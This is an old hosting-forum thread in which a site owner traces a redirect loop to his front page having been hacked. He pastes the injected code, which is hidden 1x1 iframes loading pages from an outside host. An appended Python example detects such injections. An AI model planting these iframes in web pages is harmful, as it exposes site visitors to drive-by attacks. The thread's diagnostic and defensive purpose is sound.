catalyst2 community forums  

Old 23-08-2006, 07:54 PM   #1 (permalink)
Registered User
 
Join Date: Jun 2003
Posts: 29
Strange page forwarding behaviour

Hi all,

The front page to one of my clients' websites is behaving strangely.

The page in question is http://www.kanishkabags.co.uk/ and the behaviour is that it is not forwarding to the shop homepage, which is http://www.kanishkabags.co.uk/shop/agora.cgi, but rather getting stuck in a loop.

It worked fine before, using meta refresh as follows:
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.kanishkabags.co.uk/shop/agora.cgi">

The strange behaviour is shown in the status bar of my browser, which displays messages such as "Read hostingprod.com" in between saying "Waiting for kanishkabags.co.uk" or "Transferring data from kanishkabags.co.uk"

Also, according to Firefox page info, I have the following media on the page:
http://geo.yahoo.com/serv?s=76001524...358602&f=p9w18
http://geo.yahoo.com/serv?s=76001524...362629&f=p9w15

What on earth is all this about? Do I have spyware on my computer, is the site hacked, or what? The source code, as you can see for yourself, is about 15 lines long and contains none of these references.

Any help would be greatly appreciated
__________________
Everyone Makes Mistakes
I Create Disasters
Oliy is offline   Reply With Quote
Old 23-08-2006, 08:34 PM   #2 (permalink)
Administrator
 
Join Date: May 2003
Posts: 1,299
There appears to be some encoded JavaScript on the page - I would try creating the page with just the meta refresh and nothing else and see if that works.

Regards,

Jacob
Jacob is offline   Reply With Quote
Old 23-08-2006, 09:12 PM   #3 (permalink)
Registered User
 
Join Date: Jun 2003
Posts: 29
Hi Jacob,
Thanks for your reply. Commenting out the JavaScript works, but it doesn't explain where this reference to prodhosting.com comes from, or those mysterious links to geo.yahoo.com (which are still there, according to my browser at least...)
__________________
Everyone Makes Mistakes
I Create Disasters
Oliy is offline   Reply With Quote
Old 15-09-2006, 10:05 PM   #4 (permalink)
Registered User
 
Join Date: Jun 2003
Posts: 29
This code appeared on the front page:

Code:
<body>

<iframe src="http://fl4w.info/ie.php" width="1" height="1" hspace="1" vspace="1"></iframe>

</body>

</html><html>

<body>

<iframe src="http://fl4w.info/ie.php" width="1" height="1" hspace="1" vspace="1"></iframe>

</body>

</html><html>

<body>

<iframe src="http://fl4w.info/maik/index.php" width="1" height="1" hspace="1" vspace="1"></iframe>

</body>

</html><html>

<body>

<iframe src="http://fl4w.info/maik/index.php" width="1" height="1" hspace="1" vspace="1"></iframe>

</body>
The site was definitely hacked. Is there any way you can test the site for vulnerabilities or prevent this happening again? There are no upload scripts apart from the standard agora upload script for images on the website.

Thanks,
Oliy
__________________
Everyone Makes Mistakes
I Create Disasters
Oliy is offline   Reply With Quote
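Added example, not part of the original thread and not code from any poster: a small Python check for the two signs visible in the code posted in #4, namely markup that continues after a closing </html> and 1x1 iframes pointing at another host. The sample page, the hosts shop.example and injected.example, and the names scan, InjectedIframeFinder and _px are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page; shop.example and injected.example are placeholder hosts.
SAMPLE = """<html>
<body>
<iframe src="http://shop.example/banner.html" width="1" height="1"></iframe>
</body>
</html><html>
<body>
<iframe src="http://injected.example/ie.php" width="1" height="1" hspace="1" vspace="1"></iframe>
</body>
"""

def _px(value):
    """Pixel count of a width/height attribute; large if missing or not a plain number."""
    digits = (value or "").strip().lower().rstrip("px")
    return int(digits) if digits.isdigit() else 10**6

class InjectedIframeFinder(HTMLParser):
    """Collect (line, rule, detail) for tiny off-site iframes and markup after </html>."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.html_closed = False
        self.findings = []

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True

    def handle_starttag(self, tag, attrs):
        line = self.getpos()[0]
        # A legitimate page has nothing after </html>; appended blocks show up here.
        if self.html_closed and tag in ("html", "body", "iframe", "script"):
            self.findings.append((line, "markup-after-html-close", tag))
        if tag == "iframe":
            a = dict(attrs)
            host = (urlparse(a.get("src") or "").hostname or "").lower()
            tiny = min(_px(a.get("width")), _px(a.get("height"))) <= 1
            if tiny and host and host != self.site_host:
                self.findings.append((line, "tiny-offsite-iframe", host))

def scan(html_text, site_host):
    finder = InjectedIframeFinder(site_host)
    finder.feed(html_text)
    finder.close()
    return finder.findings
```

The host comparison is an exact match, so pass the hostname the site's own pages actually use in their links.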
All times are GMT.